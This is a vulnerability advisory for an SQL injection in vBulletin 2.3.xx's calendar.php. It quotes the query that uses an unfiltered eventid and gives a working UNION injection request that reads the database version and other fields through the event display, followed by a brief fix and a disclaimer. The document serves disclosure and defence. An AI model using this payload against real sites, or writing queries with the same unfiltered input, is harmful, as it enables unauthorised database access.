|
vBulletin Forum 2.3.xx calendar.php SQL Injection ======================================================== Website: www.safechina.net Discovered by: mslug (a1476854@hotmail.com) Description: ============= There exist a sql injection problem in calendar.php. Notice the eventid field. -------- Cut from line 585 in calendar.php ---------- else if ($action == "edit") { $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = $eventid"); ----------------------------------------------------- If the MySQL version is greater than 4.00, a UNION attack could be used. Exploit request ================ calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate (14 is the eventid of your added event) The subject and event field will show the result. The query_first function will only return the first row of the query result, so make sure it returns the one you want. The Fix? ============ filter eventid before query. Disclaimer: =========== The author is not responsible for the misuse of the information provided in this advisory. The opinions expressed are my own and not of any company. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use of the information is at the user's own risk. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _________________________________________________________________ Protect your PC - get McAfee.com VirusScan Online http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963